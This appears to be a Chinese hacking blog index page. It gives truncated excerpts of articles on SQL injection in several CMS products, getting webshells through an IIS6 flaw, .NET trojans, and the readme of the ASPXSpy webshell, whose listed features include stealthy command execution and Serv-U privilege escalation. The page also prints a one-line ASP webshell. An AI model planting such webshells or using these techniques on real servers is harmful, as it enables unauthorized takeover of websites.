JSP版MSSQL连接工具

来源:King's Blog

<%@ page import="java.sql.*" contentType="text/html; charset=GBK"%>
<%@ page import="java.util.*"%>
<html>
<head>
<title>rootkit</title>
<script type="javascript">
var db = "master";
function getTables() {
window.open("<%=request.getRequestURL().toString()%>?action=getTables&db="+db,"","scrollbars=yes");
}

阅读全文 »

Tags: ,

再暴风讯整站系统漏洞

来源:红狼

文章发表于《黑客防线》0802期

再暴风讯整站系统漏洞
图/文
Cool_wXd
在这里住管前一段时间风讯爆出了两个高危的注入漏洞,再看了oldjun与flyh4t的检测之后我的心也有些痒了,于是也从网上下载了程序检测起来,下面看我的分析报告吧!
风讯的防SQL注入是通过NoSqlHack进行过滤的,不过管理员在写程序的时候总是容易疏忽,我想我们钻的也就是这样的漏洞吧。好了,我们切入正题,经过我的检测,我发现在oldjun与fly 阅读全文 »

Tags: ,

再战嘉缘人才系统

来源:红狼

发表于《黑客手册》0802期
再战嘉缘人才系统
图/文
Cool_wXd
前段日子无聊的时候简单看了看嘉缘人才系统的程序,今天在站长站上看到嘉缘人才系统有更新了,而且也说修改了以前所发现的Bug,所以便下载一套最新版的,下面来看看我对这套系统的分析吧,版本为嘉缘人才网站管理系统 v6.0.1207 精简版。
虽然简介中说补上了已知漏洞,不过在检测过程中还是发现了几个注入漏洞,下面那我们就以其中一个注入漏洞为例说说这套系统的注入漏洞,来看看person/person_sendresume.asp的代码吧。这个文件就有几处注入漏洞,我们看其中的一个吧,行147-152,如下:
resumeid=request("resumeid")
阅读全文 »

Tags: ,

动网8.1.1版后台获取webshell

鬼仔注:跟这篇文章最终原理差不多。都是利用IIS6的目录缺陷。

来源:红狼

文章已发表于《黑客手册》0802期

动网8.1.1版后台获取webshell
图/文
Cool_wXd
动网论坛可以说的国内ASP论坛界的老大了,在原来的很多版本中,都出现了不同的漏洞,而且获取webshell也是挺容易的,但是到了8.1.1版本的时候,获取webshell变得异常的艰难,前一段时间爆出了可以在boke中添加上传PHP的类型,这个在服务器可以解析PHP的条件下是可以的!在8.0版本是数据库的路径是可以修改的,那个时候可以通过上传修改成tx 阅读全文 »

Tags:

菜鸟使用Dreamweaver挖掘脚本漏洞

来源:红狼

看了lizaib的挖掘教菜鸟挖掘漏洞文章以后写了这篇文章,呵呵,其实这类工具也只是一个辅助而已
类似的editplus也是可以实现的,下面就看看这篇文章吧!

已发表于《黑客手册》0802期。

检测冠龙科技网站管理系统
图/文
Cool_wXd
今天在站长站上闲逛时看到了冠龙的这套程序,想想自己刚注意到这套程序的时候还是看手册上刚刚提出Cookie注入的概念,可以说这套程序对我当初学习Cookie注入帮助也是很大的,而且前一段时间还爆出了跨站漏洞,不知道这套系统还有没有什么有意思的漏洞没有被我们挖掘出来,所以便下载了这套程序检测一下,版本是冠龙科技企业网站管理系统V8.2。
手册在07年的12期里面有lizaib的一篇《菜鸟挖漏 阅读全文 »

Tags:

几个.net的马

来源:红狼

1k 的
阅读全文 »

Tags:

窥探SQL预编译内幕

Author : kj021320
TEAM : I.S.T.O
Author_blog: http://blog.csdn.net/kj021320

前言套话:

本来文章打算昨天就写出来,环境没搭好… 迟来的祝福~Mickey 生日快乐!

首先感谢PT007竭力帮我搭环境,可惜最后还是没能用上,还有ISTO团队的幕后成员,AMXSA,SUMMER等…还有我几位好朋友axis,suddy,larry 春节提前快乐!哈!

现在部分大企业 都采用DOTNET或者J2EE,迟点应该都是RubyOnRails,之后的技术越来越成熟,在SQL操作无疑都使用绑定变量,有些人叫预编译,也有些人叫同构SQL,参数追加…

像dotnet j2ee 上这样的使用几乎成了习惯,规范!
阅读全文 »

Tags:

ASPXSpy 1.0

作者:Bin
来源:Bin-Blog

Readme:

1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。

2.密码为32位MD5加密(小写) 默认为 admin.

3.采用POST方式提交数据,增强了隐蔽性。

4.添加了IIS探测功能,遍历IIS站点信息。

5.增强了对文件属性的修改。

6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。
文件名为bin.asp Shell 为<%execute request(“B”)%>

7.增加了 Serv-u 提权功能.

8.可以对端口实现单线程扫描。

9.可以对注册表进行简单的读取.
阅读全文 »

Tags: ,